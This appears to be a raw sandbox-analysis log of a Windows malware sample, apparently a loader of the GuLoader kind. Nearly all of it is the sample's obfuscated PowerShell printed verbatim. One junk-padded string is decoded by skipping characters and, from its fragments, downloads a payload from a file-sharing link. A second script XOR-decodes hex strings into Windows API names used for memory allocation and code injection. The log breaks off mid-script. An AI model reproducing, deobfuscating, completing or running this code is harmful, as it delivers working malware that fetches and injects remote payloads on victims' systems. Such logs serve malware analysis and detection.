Vi1Anv4Frk0 Am4 Bi3 Tr4 unCLuf4 ExBDed4Udy0For6 in1Lam5BekCLic4SemBoct4 Gi4 In4Til8Sad4 FeCDat4Her6Sta6 Co8Res4WraAAut4Pro1Ref5taf0 Ae4Cha9 Se4 Sy0Sle0 FiDjaz0 Fo1 Su6 aiBTho4impARaa4UnuBFje5Len5Non5 Fr7 Ud4abr0Mat4 So6rot4SbeC Sn4SmiAUnb5Fak0Ind1 FiCTer0Ind9Syg0Tri5 Ic0hof1 In4Gla3 Ne4Jer4 Su4luf9Gri5 Bo6 Tr4Rej0Pas0TonCPro0PluBPse6Kor1Mir4 Ga0 Ma4 Du3San4 SaC Be4MrkB Mo4Plu0Ton7Rec1Air5 MoCGir5 Sa5 Di4bet0 Sp0 FeD Di0 Mo1 St6 As1ved4 Fr0 Sn4 Ca8hoc4DsiAGum1Ede5Non0 In9Fla0Jub5Stu0 ra1Abs6und1Boj4Soc0 Be4Mis8 Or4PapA Be1 Bo4 Kr0Tra9Ins0Unr5Dep7KonE Dr7 Po6Ras5 LoC Th5 Un6for5Adm1 Pa4 ol0mea4 Sk8Gas0 SkB Ti6 Ov8 de5 Tn0 St4Ung9Rve5 Fr1 Pa4MilCGra4 Na6 Ri4Kaf4Sor5 Ov6Til5 Ex1 hy6Pal1Fan4 Bu0 En4Pau9 am4Bop0 Et4 Ga2 Fa4 Ta4Ope5Mor1Saa4Sto0Sub7Kat8Kva0 StCFor'Sti;Phi&Avi( Fr`$FinDEreeTramMarorin7Tot) Sa Fo`$DefTVito VepForb SleEletCoajSkoePdanBrlt Ar2apo;Gro`$ AfT cho SnpEneb KaePretMarjPreeBasnOogt Bl3 Tj Ver= Zi Pem BeuSejl IniChaeFasbNavrHoo1 Ka1 Sa Ste' Ud0Bos1Una6 Fr1 My4Ven0Chr4Qua9Eng4VokC Aa4 TiECom4Pos4hje0NonBExc6Hen1Thi4 Pa0 Ro4Lge3 Oc4AfsCSca4ForBOxi4Sta0 Sh6Coy6Jac4AstAPra4OmdBTro5 St6 Ja5 Po1 Pu5Nat7rea5 Pr0 Au4 Lo6Ted5 di1Bus4semA Kr5 Da7 Bu0NatD Fr0Qui1Til6 LaB Di4 KrANeo4IsoB Cz5 St5 Di5 Fr7Spu4 Fr0Une4Gen6Kom4 AmCSam4ColA Ri5 Ln0Glo1Red3cas0Hav9 Us0Str5Nub7ShiE Sl7 Fu6ung5ProC Tr5 De6 Be5Unc1 Dr4Unf0For4lam8Hyp0UntB Ad7 Co7 St4Fyr0Erh4 Ud3Eng4Dih9Udg4Exc0Pyr4 By6Bee5Viv1Bes4 UnCBee4SliAGuy4 liBPer0 LiBApp6dot6tog4Cor4 He4 Gr9Pol4 de9 Un4SolCPar4SpeBPos4App2 Ne6Sti6For4TorA ee4UndBflu5 Cn3Unr4God0 Hy4 CyBNoc5Iar1 Il4 anC Ol4DamA In4 DeB He5Loc6dat7Rkk8 Ou1TipF to1 EtFAfk7 Di6Ove5Und1 Un4 Sk4 Fo4ArsB Tr4 Mi1Ott4 Ti4 af5Jon7Ski4Beu1Aft0Bou9 Fi0Exf5far0 Fo1Kon6Trs4 Re5Skr5Lea4OyeAAdi4Und8Sej0AegCOve0tomBsam7Mon6Exp4 Gd0 An5 ac1 He6ConCKje4 Ra8Pre5Ndr5 Pr4Men9 Ma4ver0 xe4Unc8Han4deb0 Sy4MenBSku5 Co1Fol4Fat4Ali5 Fo1Ind4SufCDet4AnsASan4 RiBRrl6Ark3 Af4 Vi9Lns4 Kh4 Sy4Tri2Bhi5Hor6 Fi0WreD Mn0 Pr1Var6LoqBInf4 NeABra4 LeBemb5Cob5Sim5Til7dia4ker0Spn4 Ef6Mac4CabCSqu4VinAVed5 In0 He1 Vi2Ent0 TrCFre' St;Vir&Mil( Sl`$ RiD ReeKunmBeno Be7Lig)Dyr ha`$ SuTEpeoMicp SebPrvebrot CajLeue chnTortAfl3Ren; Me`$panTSanoMelpEanb itePapt Loj SueFlinlaatEnk4Rep wro=Dev EkmMuduExcl Bai ByeSambBygrIvo1 ka1Str Du' De0 gr1 An6Res1 Li4 Pe0Fre4Unw9Cyk4ShaC ty4 HyEDdf4Cyl4 Me0ForBElu6Bra1Gal4Nat0Ind4Fas3 Re4 foCdem4 UbBSkr4 Pi0 Pa6Dsi8Poe4 Te0 La5 Un1cyk4FieD re4SmuAOeg4 Ta1Udf0UteD be0 Vi1Spr6For1 ec4Dar0com4 sa8kre4 TaA Re1 Se7Afp0 De9Fre0Rom5Epi0Rad1 Ti6 Mu1 Un4 Sw0Reg4Cal8Dis4UdbA Vi1etr6Byg0Nap9Nh 0Pri5 Te0ant1 Gu6Dis3 Fo4PreA Fl5Con7 Wi4 Go7Ang5 Ep7Uhd5MorC Se0Uns9Byg0Lem5Pri0 Bo1Hal6Ure4 Ny5 Va5 Ur4 ReALeg4Phy8Aus0JurCkra0 LuB Sk7 No6Bro4Bem0 Sk5 Pr1Und6 KeC Ta4Hul8Tra5Bar5scl4For9 Ca4Ect0 pr4neg8Kod4Oct0Gav4GrnBRec5 Fa1Vet4Att4doz5Wor1Kno4 ScCDos4ForA St4UndBBad6 Ta3 Ec4For9Exp4 Fa4 kt4Cer2Por5Sem6Fry0BanDAle0 Am1Hea6 BuB Fe4 SkASid4UnwB Yo5med5 An5 Eq7Gas4Slo0 Ap4 Sa6 Ca4 NeCUdk4IgnANvn5Roc0 Cy1Fam2 Me0KaiCKal'Atr;slu& Co(Son`$SpuDTeleUnsmVasoBeg7Reo) Po Gra`$ SeTFuroBibp Peb CaeTyrt GljHareNovn KatLet4 Pr;Pil`$ ZyT Omo NopSukb Mie GrtTraj Ope VanScrtBro5 Re El=San Alcm Hau til NeiJete LybSherDis1 Mo1 As Bi'Ret5Mor7 Tu4Pro0 Ho5Fds1Kog5 Ou0foo5 Sc7 Un4 SvB Ss0Don5Cra0Rai1Rif6Omg1 Ca4rom0Tek4Sal9 Bo4 raC Ra4CitEhun4Ska4Het0 UnBUbe6taa6 Tr5Elb7 Di4Pro0 Ef4col4Sta5 Bu1 Sa4Sin0 Ty7Deg1 Op5FjeC Pe5 Dh5 Bi4Orl0Def0MusD Ou0UdgC An' Ko; An& Mo(Sac`$PenD iceFolm DeoTun7Ope)Blo Lyk`$UniTSproGropHalbTegeBolt BijKatensenejet To5 By Mal Da Fy;Gen}Ult`$KanUbaanmedf veeMaml ve1 Ph9sek6Par Ko=Aff Tilm Kuu Anl HjiCaneforbtrirOpe1 Ep1Mar ov'Tov4 GaE Va4 Ci0kog5 Re7Ind4 PrBSek4far0 Da4Gce9sko1 Sw6 Sc1Sar7 Ma' kl;eum`$ComT LeoThapUnpbHase Fot Rej NieUntn YotFin6Spd Und= Ch remHyduWhil HeiHile Teb Fur Be1 Gr1Val sh'rep0jub1 Le6kot9Lap4 Lo1 ta5 Ca7 sn4 go0Frd5 Sp3Dou4 Co4she4 Sl9Pre4 Sl2 Li0Ret5Yde1Bor8Med0 Qa5 Ka7 HaELak7 op6Var5InrCVit5 Ob6 En5Tra1 He4 eg0 Se4Pho8Tal0 StBTri7Apr7Aud5For0Una4SmrBVog5 To1Anl4tjaC Su4Chr8Chr4Kns0vkk0StyB So6OutC Un4 DiB Gi5und1Aff4Slo0 Bi5Str7 Sn4DepANed5Unc5Sup7 Re6Sub4Une0 Ov5 Ar7 Al5 Ep3Spi4CytC ac4Tal6Fas4Mil0Exa5Ges6 le0 UkB Pr6 Ja8 hj4Tri4Acc5Gra7 Fu5Ind6 Af4 EsD St4Osc4Far4Ana9 ci7Unb8 Kn1 LiFDan1 VaF pe6 Me2 In4 Pe0Erh5Res1glo6 fe1Odo4 Va0Let4Chr9Att4Fas0Vej4 hj2 Fl4 Ac4 tr5sto1Pov4 Sa0 Ti6Slu3Led4 AbA Te5 Cl7Kna6 Su3 ud5Kus0Non4 DeBKlo4 Co6 Un5Tre1dis4SpyCIbe4sadAKli4 FdB Un7Vit5Bod4BriAAsk4KanCMrk4OpsBFem5Afl1 Te4 Tr0Wat5 Mi7 pa0BilDCho0ForD Sm4Bil3Kip4BanEUba5Fod5 Re0 Sc5 Tr0Kac1 Fy7 Fa0Wag4 SeB Ny4 Af3Heb4 An0 no4Sha9 So1skk4tor1UnsC St1Str3 Ca0Fin5Emu0Vin1 ma6Ord1Try4Jud0 Mi4Flo8Sau4 myARli1Inc1Out0 MaCVag0Pro9Con0For5 Na0 UtDCou6reg2Leg6 Mi1Ove7Bor1Cri0Biv5Lad6Ura5 Bo0 PrDSna7coeE Ic6MudCFds4DepB ta5mon1Nit7 mo5Mar5mae1 Mo5 Co7Equ7 Va8Sko0 Ti9 Do0skr5Ram7LocEOve7 Co0Vid6OrdC Me4 MoB Ad5 Rv1 Ju1 De6Ber1 No7 Ma7 Sp8Frs0 Fn9Dry0 Ma5 sy7NolEStu7cor0For6hypCSen4UddBDik5Cir1 Ke1 Fi6 St1Pro7Jal7Mar8 Lo0 He9Pan0And5 Un7 FiE In7Mat0 Sy6 SyC Ps4 GoBNed5med1 In1Oat6Omb1Unr7 Fr7Kna8Sve0GasCSem0Cap5bag0 SdDArc7 AdE in6SkrC Vo4RanBPro5 Ra1raa7Eco5rod5 Ta1Bet5 No7Lan7Ped8 Sm0AugC Un0TerCKar0 MoCLon'Nee; Ko& Ak(Sam`$ FyD Hoe AemopdoFor7 Ca) Dr Und`$SanTdraoracp Mub Coe TjtPosjSedePten RitPan6 St;Unb`$skrGArklpryaHypm MaoMir Tol=Med ImpfWhikForpUlv Fun`$OveD ApeEpom HaoAgt5 pr Ank`$ZomD GeeGram Ovo Ou6 Ic; By`$LufTTrooUdep nebBaleSkitsaijPece RenSimtUng7Ben Me=Sta TjrmAdru Ovljeri Bae TjbTemr Ba1Uds1Reg Sto'Bry0 Po1Fus6Kom7 An4AllCTak4Can4Tan5Dis7Liv4 Am6Erh5 Re0 Wi4Hem4Bel5 No1 Ch4 Se0 It4 An7 In1Bar6Mec0Pre5 Do1Tyl8 Ga0 Tm5 Dy0 Ka1 Un6 Sy9 Ve4Mar1Uds5 Go7Eff4Met0 Af5 Pr3Hid4 Bo4Ung4 Sh9 Tr4Ufr2 Ud0tilBDyl6 NoC Wo4 AnBTan5Ser3Bes4LinAEff4RegEEsm4 Co0 Ov0darDIsn7 ChE Eu6RaaC Fo4SysB Pi5Kon1Tra7 Sa5Adm5Udm1Cie5Ter7For7 Xe8 Hj1TrsF Ta1 stF Gr7 IlFFod4 Hj0Kru5 Ta7Red4BelAGug0Ins9 Pl0 Rh5Tem1 Pa3ant1Kar1 Tu1Ana5For0 Pl9Tet0Gym5 Ly1Sub5 Pr5 KlDSla1Swa6Hal1 In5 Me1 An5Asp1Und5 Po0Fod9 Pr0Kal5Win1Vag5Afs5PasD Po1Und1 Sk1Ter5sen0FilCUnp' be;Hed&Trn(Pri`$VogD MaeBommBruo Ov7Age)Tor She`$ GoTsalo LopDivbAvoeBattOphj Cae Don SitSkr7Udm; Pr`$ FlTTrioPropsocb Hue HetScij Bre SonUdft Hu8Rem For=Pre DodmUntuBevl Rai Tie ScbReprMul1kal1 In Bem'Cat0 Po1 Bi7Tan6 Si5Pra0Fra5 Si6 Ma5Wil6Eva5Fis0 st4Pok9 Et5 Le1Sjo1 Po4Dra1ins6Jeg1 Di5 un0Coo5For1 iv8 Na0pal5 Sk0Obl1Wra6 Sp9Cya4fan1mam5Per7Nap4 Pa0 Ra5Cre3Hyp4Sar4Tra4Rad9sin4 At2cut0PosBamy6 BoCTil4ErhBFor5 hy3Cen4 JaA Ob4UndE St4Cra0Bor0 CoD Sp7EnrEFle6CroC In4FerBRew5Rep1Pro7Are5 Ke5ami1Fer5 Ta7Ber7Kon8 Do1 SpFFon1 UfFKre7MenFsem4 Na0 Ko5 gt7Tra4GesAUns0 Ge9Spa0 Ep5Dmp1Ind0Avi1 Cu1 Sk1Bur3sma1NonDDan1 koCPae1Fin2Ret1TopCPep1 Re7 An0Den9Pou0 Fo5 Gu1 Re5For5UdpDKlt1Car6 Uf1Alt5Kra1 Uh5Tek1 De5Ham0Ele9Six0Bed5 Do1Spr5 Pl5 BeD Ky1Pad1dis0BisC Sp'Par; Ir&Sol(sni`$SemD AmeFunm OvoSto7 Te)Let gam`$CheTHeao CopOssbHoleOvetArejBree Apn AutRaq8 Ro; Ho`$ ArmUstuFodlTeliRhyeCarbStirBru0Dom1 Su Ek=mel Lat'Ench Omt Alt Lap Brs Ve:Suf/ Gu/aerdsvirRediWhev SteDis.BragJubo froKlkgPlelGare Sw.EtacBacoProm To/BrauCircCom? Kue Pex Mup PeoOvarHaktKat=ChidCytoJerw TcnDicl TroDipa PrdXan&BryiUtidBro=Skn1Jeu- CaRSam3CzarBun3 AfS VeETilI BiXPosJCist CrsCadxPiev OpIBerG Pel Re9DvrFslu3AmiJTecRHof1fanE Ini BobDral NavGlaL toO GetSenWGal'Shi; Tu`$RejmForuForlCraiSyne Enb DerDob0 Br0 No Got= To YamUviuToilTopi Noe frb PorFun1Gro1Tes Eli'Ude0Mar1 Sk6 ma1 Re5end7Rec4Tuf4 Ty4Kla8 As4 Si4Ahn0 Sd5Tho1Dan8Bra0rom5 Fo0ChaDBus6 irBBil4 Dy0Con5 Op2Dem0Bet8tun6 UnA Dk4Mrk7 Co4DyfF Eu4 By0Cri4Inf6Rec5Den1Ove0rel5 Pe6undB Ra4Dag0Pro5mor1Ove0 SpB Ob7Ber2 Ef4Par0Gla4For7 Re6 sh6Slu4 Lo9Gif4 hiCSti4 St0 Un4JeaB Ch5Bag1res0WorCbyg0GraBSen6Non1 St4BioAPan5S N2 An4ProB de4Med9Lge4OrdA Mo4Ker4 Ko4Sea1 su7bil6 Du5Fif1 El5Wis7 Re4 AfC sy4CouBKad4Exc2Jul0LeeDPlu0 Ke1 Wh4Ant8 Ba5Bet0 Ti4unv9 Pe4TroC Re4 Pi0 Le4kur7Fre5 pr7Afm1 St5 Tr1Lue4mus0RapCTil' Mu;Str`$AniT BuoVeupOveb AmeOutt RejStveclanGuet Su8Sve spi=Cog Famm ArucogldifiTileyeobSukr Ma1Nat1Ska Kon'Afm0Nym1Bob6Mil7Pav4SkrCQue4Ret4Pri5 Me7 So4Lae6 Ef5Sfo0Fal4bri4 Me5 Bl1 Ph4 pe0lea4Gar7Anl1 Ca7 Ig1 Ah8 Ra0 De1 Om4 Bu0 Le4 AfB Fo5 Pi3 ea1BjnFAne4 Fa4 Be5Gen5 Pa5 Pr5 Sv4 Is1Arc4Sup4 Pa5 Gr1Sch4 Te4 Fr'Cle;Snd& Wa( Do`$SamDHare Stm MeoNon7 Pu)Pro Qua`$ LeT AloPrip SpbSike Bat SyjMicepolnToat St8Sup; el`$UnrBmejiCyaaspir Foc Tru FlaStrt Ste StbTru2Kor=Pre`$BagBKali MiaTrir Hoc ovuHara DitInde Mab Ak2Vir+ Un'Dat\TraT MaeDaglThae AcfLevo InnPou.CyanPendMant Si'Chu;Lio`$TalD Str BaaTasmAlva In= sn' Ph'Und; Sq`$EpiTEbeoRaap Udb Sye Ret SpjFore FonOpet De8 Pu Re=Hva Relm EnuRenl Mni PreGasbIkarLog1 Tw1 En Afs' Ti7 Ne6Fis5Uds1 Is4Tur4 Sa5 My7 Ca5Clo1Rve0But8Kaf7Fum6 An4 No9 Cr4 Fr0 Co4 Ha0Gry5Pub5Sty0Kom5 Fo1 ta0 De'ami; AniWeafCon Som( Mu- HenSnao Iat St( DeTMurebidsAett Ka-RefP Pra SitReihPat Sp`$ spBHomi aaa Gmr RocFejuAntaNortMyoeJukb Ne2 ek) Ta)Sha Ov{SliwTawhminiForlMimeSvr hus( Go`$StrD Bar BeaBatm Pra Pr Sc-InfePaaqInd Ove' Pi'Snv)Dec For{Slv&Pha(kno`$BetDRyteswemredoCla7 Be) kl Fr`$DynmStauEpilHeni Koe FibTrirPro0Tra0San; Be& Sa(Sam`$RobDFrie Trm UboNit7 An)Hov Bo`$DaeTKeaoHaupadmbConeSmatPerjPrdeSgenOutt Sm8ser;Pue}ForS kleNart Ge- UdC Foo Con Tet Scedepn Ast un Pro`$PhaB OviPuna BerGasclanu UsaStotCraeSkrbIsc2Ste Hel`$VitDJogr StaRhemRosa Sy;Pri} Ca`$ KaDNorr Gaa Pom Noa Pu ci= Ha DeG Sve PrtSwe-IsrCHamoSubnColtUvse mon BotSky Niv`$NucBSlgiJoraUnvr Ouc TouUnma Int Tye BebVas2Mod; Hi`$ElbT reo CopMicbSameetatAutj Afe DrnKict Re9 Tr Uns=Afl LymHydu SwlHomiFloe hobInkr Ku1 Mo1Sal Bes'Sar0 Te1Fod7Bru1Abo4 FuAPsy5Plu5 Mo4Qui7dis4 Pi0Fak5Reb1Tho4DagF Af4 Fe0Spa4DesBHig5Bor1 Co0 Po5 Mu1 Re8Hys0For5sty7SkyEGar7But6 Ba5 anC Mo5Not6 Fa5 No1Afh4Rev0 Bo4Met8Aut0TryBCod6 ma6hir4homASod4 StBPlu5Doc3 Vi4Men0Spo5 Ha7 Ag5Oec1Dep7Neu8 Di1SkrFKur1SneFRot6Gru3 Ur5Skm7 Sv4 InAWea4All8All6Ase7Chi4Reg4 Al5Dex6 El4 Be0 Ha1For3Her1 Sa1Obn7She6 Ma5Vex1 Is5Akr7Tor4NetC ta4BibBDes4 Bj2 Sd0 KoDRaf0Abn1Tro6 Fi1Wug5Sla7 Ly4 An4Bol4 bo8Eff4Irr4Stu0AnaCRes'Jur;Ska& Ba(Nel`$ SaD Ere Stm Boo Fo7ali) In Hj`$SkoTImpoFejp Uvb Vie FotFjejSome Ovn sutDoo9Elv;Kol`$expDAntrLliadecm Foa Th0 St Au=Aph Tarm Kau LalUnpiScaeHorbLanr ta1 pe1 Mi Tan' St7PyrElyc7 Up6Pos5WooC Pe5 ga6Hen5Bef1 Su4 De0 Ca4 Ov8 Un0NonBBom7Kre7Chi5Uni0Ana4StrBsik5 Ly1 Mu4RigCElo4 Tr8Bes4 St0Pac0LarBUdv6 FjCTel4afnBMej5Epa1 By4Dyn0Bus5Aar7Scu4AabAGul5Koa5 Fo7 Pa6Ove4Win0Isr5For7Qui5Dir3Non4 doC St4 Co6Glu4Gro0Caw5 Ca6Dio0 BaB Ov6Ove8War4 De4Hul5 Se7Sem5 Au6Pre4IchDHek4Sam4Bog4Pai9 Da7 Kl8Viz1AleF Co1 MeFGui6Son6 Ni4ArcAPhy5Col5Pro5 LuCCen0SarDOct0Reo1 Vi7Und1 op4BlnAtsi5 Ha5 Pr4Sko7 De4 No0 Vi5Ind1Rmn4 ViF By4Byg0Alk4SubBAna5 Kr1 su0 Tr9Upr0sol5Met1Not5 Hu0Gul9 Li0 Mo5 Ke0Cha5 Pa0 Br1Slu6 De7 In4 knCLrd4Hyp4Com5Pau7Ens4Exe6 Fi5Cou0Avi4Une4 Fl5Ale1Rot4 Br0Fri4Gan7Alo1Sha6Lan0Spd9cur0 Re5 Sk1 pr3 Pr1 Bu1Sej1 Be5 An0 ViCTan'Pia; Ci& Ty( Da`$ GrDSkieSismUnio Re7str)Bje Opl`$LreD Unr Maa Frm foaTel0 Sa;Fun`$ MoF Juu Skn Erd BgeSpar Ct=Gal`$HomTBogoFirpDecb Vve Sit PrjAnteIrenPalt Re.PalcSoloDysuJvnnBait Bl-Rec6Obl4 Ac0 So;Mde`$ForDTegrUdsaEftm ImaAft1Sta Ig=Ung DecmGiluBevl beiSpre Spb FrrInd1Pra1 Pr Tak'Oar7 VoE Fe7Gul6 Aa5 GuCInt5 Ch6Int5Pre1 re4sar0 Un4Ugr8 Sk0 MeBInc7Pur7 Pa5 Bi0fre4SlaBSel5 No1Sup4 ThCUce4 Ti8mag4Was0Acr0ThyBStr6ArmCBro4DemB Fo5 Ov1 Fo4Vin0Ram5 Ka7 Ba4PluA En5Til5Bas7Bro6Ros4 St0Ter5 Ma7Cha5 Ta3Udb4AgeCakh4Spi6Tri4Svi0 Ke5 In6Stv0 FaBOut6Bio8Let4Mrb4Ser5Gro7Unr5Hyd6Pol4RevDKul4Ret4 Ke4Syd9 Ov7Gir8Bou1ForF no1SpaFBog6Pre6slu4ClaAHam5Sin5 an5SysCFad0HreD st0Kan1Esq7Dun1Tal4HalAVel5Kan5Una4Mun7 Vo4Hyp0Tel5 Ha1Tro4 StFTov4 Ci0 An4IndB An5 st1 Dr0Tri9Kol0ant5 Kn1 In3Hen1Sym1Ube1Leg5 Pr0Tri9Azy0Snv5 Fo0kno1 Ef7 Af6Hal5Van0Tal5 Ko6Urb5 Dy6Gre5Arg0 Pl4Ufr9Hyp5 Op1nar1 Co4Smy1Dip6 Ru1Paa5Skl0Wry9 Sa0 Ka5Ski0 Ln1 au6 No3 th5 Su0Tri4PriB Ug4Dil1Gaa4Phr0 Be5Fir7 Ho0IndCFlu' Ud; Sk&Ind(Ara`$ PsD Hje SomDepoCan7 Pl)Sup Ove`$OmsDSkorOveaTormIbraSan1 Hy; Pa`$mieD cyrUmoaUdlmAfra co2Rej Kon=Air FemAtruPoll Poi Obe Mob BerFim1 Mt1spo fl'unp0sto1Bes6VedDNon4Jvn4Dei5Exp7Udv4 GeAKvo5 Nh6Pfe4Lys0Unm5Spe1Phi4 FiD Te4Opr1Out0Cic5 Ka1 An8 Re0Ont5 Un7SpaE En7 St6Ort5HieCMia5Abe6 Pu5 Ch1Uns4Pen0Pol4Lng8 St0CraBung7 In7 Fo5For0 Mo4VanBAni5Mal1 Pi4HalCReg4 Nb8 di4Bag0Fir0 GrBHet6RevC Ja4PikBTem5 co1Thy4Qua0Ban5Cor7 Un4 CoAAdd5Mas5Ska7Kns6Par4 Ky0Prf5 La7Aft5Pro3 Bo4 ErCHel4Tob6 Li4Ode0 Mu5Ndh6 St0TraBQui6Mut8 Br4 He4 Ve5Dal7 Ff5And6Car4ApeD So4Eag4 lu4 Ra9Dek7Tak8She1 SmF Go1RemFApo6 Ba2Mar4Act0 Si5Ken1Cow6Sjo1Kan4Pos0 Bn4Bec9 Br4 Re0 Bi4 Fo2Mak4 Te4Ble5Str1Sva4 No0 Ve6 Ar3 Kn4 ReABat5Une7 Af6Edi3Myx5 Ns0Ass4 AbB Un4Non6Ste5bre1Rum4 TrC St4rimASka4IndB No7Kur5Cen4 UdA Ul4 OvCBra4IodBLiv5 Wo1 Pr4 ca0 Ul5Hyp7Deb0RooDNyh0GesD Ce4 Pr3 Li4 InEUnd5Hew5 Ne0 hi5 Nu0 Le1 Tr7con6Dgn5Ere1Aad4Arm4pro5Rbe3 Et0 Fo5Sat0Wom1 St6For3 De4 BrACap5Spa7 Ts4BulBKal4Tor4 Kh4Ove2Nos4Ude9Thu4Coi0sal4 he1Kel0HauCKry0Zoo9 Un0sej5Top0FemDKrs6Rot2 Ba6Tro1 Co7 So1Cha0Hre5bia6 Fu5Bes0 VaDInh7GisE Vi6BasCNym4IndB Sp5 Da1Omb7 Vs5Bir5 Hi1fil5Aab7 Br7 Sm8 Ko0 Un9Und0For5Xyl7SkaE Un6 AdC Sy4 SkBFav5 Di1dis7Sag5afv5Bre1zaq5Mag7Fus7 Gr8 Lo0 Un9fir0 Ga5Rej7 GlEMil6RicCUnp4 ZiBFro5Aff1Ops7 Di5tea5Nyk1arr5vag7 Ch7 Qu8Dun0 Ng9rev0Vot5Mar7 KoE Su6 InCAno4IndB Dr5 Ru1Dek7Pen5 In5Bor1Sto5Upt7Nyo7 Mi8 Lo0Try9 Sa0 So5Thi7ExeEOve6 AlCIdo4NeoBcos5 Lr1Uds7Trs5 Ca5Cil1 In5Unm7Fla7Paa8 Ud0UnbC Pr0Phy5Enc0 DaDUfa7SocEFin6TerCDds4 voB Te5Cor1Und7 Kl5 My5Sov1Bas5unh7Vel7Lan8 Fa0 HvCQui0TapC Ko0 DoC Ud'Oli; Es&Fej(Gad`$DueD Gae ChmPosofor7Cle) Wi tid`$CasD Hur Prahilm Hoa De2 Im; ar`$MarDCoirRecaSchmBroa fo3Tnk Al=Swe Fum BruGlolRuii Kae SobBilr Ve1Eop1 No Be' No0Mis1Dek6 PoDBar4Beb4 Av5Sta7 Ba4UnaALyn5 Vr6Zit4Pop0 Co5Paa1Spu4GenDDep4Cyg1 Gr0ForB Gr6 UnCRad4 WeBbas5Bit3Cla4 LaABes4 UtE Ki4 An0Fav0 PrD Ac0Mus1Tra6Oxh7unr4 AnCDes4Tou4Ufi5 Se7 Ud4Dak6flu5Dop0 Be4Gas4 Ma5Eng1 Af4Res0Col4 Lo7Dom1 Sk6 En0Okk9Amf0Mol1 St7Bop6Roq5Bes0 dr5 In6 Ko5 An6 Ge5Job0 In4 Un9 Du5 li1 Mu1 le4 fr1Lym6Str1Unp5 Si0Inc9Ove0 Gl1 Fi6 Al2 Ud4Unm9 De4Pha4 Jo4 Te8 Ru4LanAKil0 Hv9Afs1Raa5 Ga0Epi9 El1Pro5 Ta0 ReC Tr'Coe;Mel&tem(cel`$ AgD ToeDulm OboInd7 Ne) di Tal`$tesD Gerdoda PemFrka hi3Idi# De;""";Function Drama9 { param([String]$eugrani); For($Meddelel=3; $Meddelel -lt $eugrani.Length-1; $Meddelel+=(3+1)){ $Unsnaf = $eugrani.Substring($Meddelel, 1); $muliebr = $muliebr + $Unsnaf; } $muliebr;}$Hete0 = Drama9 ' GnI PoE teX Lo ';$Hete1= Drama9 $Tugte;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Pow*r*\v1.0\*ll.exe $Hete1 ;}else{&$Hete0 $Hete1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function muliebr11 { param([String]$eugrani); $Sibylssk = (cmd /c 'echo 16 && exit'); $Andesinepa = $eugrani.Length / 2; $Skrterne = New-Object byte[] ($Andesinepa); For($Meddelel=0; $Meddelel -lt $eugrani.Length; $Meddelel+=2){ $Skrterne[$Meddelel/2] = [convert]::ToByte($eugrani.Substring($Meddelel, 2), $Sibylssk); $Skrterne[$Meddelel/2] = ($Skrterne[$Meddelel/2] -bxor 37); } [String][System.Text.Encoding]::ASCII.GetString($Skrterne);};$Nonpreciou0=muliebr11 '765C565140480B414949';$Nonpreciou1=muliebr11 '684C46574A564A43510B724C4B16170B704B564443406B44514C53406840514D4A4156';$Nonpreciou2=muliebr11 '62405175574A4664414157405656';$Nonpreciou3=muliebr11 '765C565140480B77504B514C48400B6C4B5140574A55764057534C4640560B6D444B414940774043';$Nonpreciou4=muliebr11 '5651574C4B42';$Nonpreciou5=muliebr11 '624051684A415049406D444B414940';$Nonpreciou6=muliebr11 '7771765540464C44496B44484009056D4C4140675C764C420905755047494C46';$Nonpreciou7=muliebr11 '77504B514C4840090568444B44424041';$Nonpreciou8=muliebr11 '7740434940465140416140494042445140';$Nonpreciou9=muliebr11 '6C4B6840484A575C684A41504940';$Demo0=muliebr11 '685C6140494042445140715C5540';$Demo1=muliebr11 '66494456560905755047494C4609057640444940410905644B564C664944565609056450514A6649445656';$Demo2=muliebr11 '6C4B534A4E40';$Demo3=muliebr11 '755047494C4609056D4C4140675C764C4209056B405276494A510905734C5751504449';$Demo4=muliebr11 '734C57515044496449494A46';$Demo5=muliebr11 '4B51414949';$Demo6=muliebr11 '6B5175574A51404651734C57515044496840484A575C';$Demo7=muliebr11 '6C607D';$Demo8=muliebr11 '79';$Stav=muliebr11 '707660771617';$Fornagled=muliebr11 '66444949724C4B414A5275574A4664';function fkp {Param ($Redeter, $Jostoct) ;$Topbetjent0 =muliebr11 '01704148444B53574057401414100518050D7E645555614A48444C4B781F1F66505757404B51614A48444C4B0B624051645656404847494C40560D0C055905724D405740086A474F404651055E05017A0B62494A474449645656404847495C6644464D400508644B4105017A0B694A4644514C4A4B0B7655494C510D016140484A1D0C7E0814780B6054504449560D016B4A4B555740464C4A50150C05580C0B624051715C55400D016B4A4B555740464C4A50140C';&($Demo7) $Topbetjent0;$Topbetjent5 = muliebr11 '016E4A574B564E05180501704148444B53574057401414100B6240516840514D4A410D016B4A4B555740464C4A501709057E715C55407E787805650D016B4A4B555740464C4A50160905016B4A4B555740464C4A50110C0C';&($Demo7) $Topbetjent5;$Topbetjent1 = muliebr11 '57405150574B05016E4A574B564E0B6C4B534A4E400D014B5049490905650D7E765C565140480B77504B514C48400B6C4B5140574A55764057534C4640560B6D444B414940774043780D6B4052086A474F40465105765C565140480B77504B514C48400B6C4B5140574A55764057534C4640560B6D444B4149407740430D0D6B4052086A474F404651056C4B517551570C09050D01704148444B53574057401414100B6240516840514D4A410D016B4A4B555740464C4A50100C0C0B6C4B534A4E400D014B5049490905650D01774041405140570C0C0C0C0905016F4A56514A46510C0C';&($Demo7) $Topbetjent1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Apom,[Parameter(Position = 1)] [Type] $Forbry = [Void]);$Topbetjent2 = muliebr11 '016140494C4E440518057E645555614A48444C4B781F1F66505757404B51614A48444C4B0B6140434C4B40615C4B44484C46645656404847495C0D0D6B4052086A474F40465105765C565140480B774043494046514C4A4B0B645656404847495C6B4448400D016B4A4B555740464C4A501D0C0C09057E765C565140480B774043494046514C4A4B0B60484C510B645656404847495C67504C49414057644646405656781F1F77504B0C0B6140434C4B40615C4B44484C46684A415049400D016B4A4B555740464C4A501C09050143444956400C0B6140434C4B40715C55400D016140484A150905016140484A1409057E765C565140480B685049514C464456516140494042445140780C';&($Demo7) $Topbetjent2;$Topbetjent3 = muliebr11 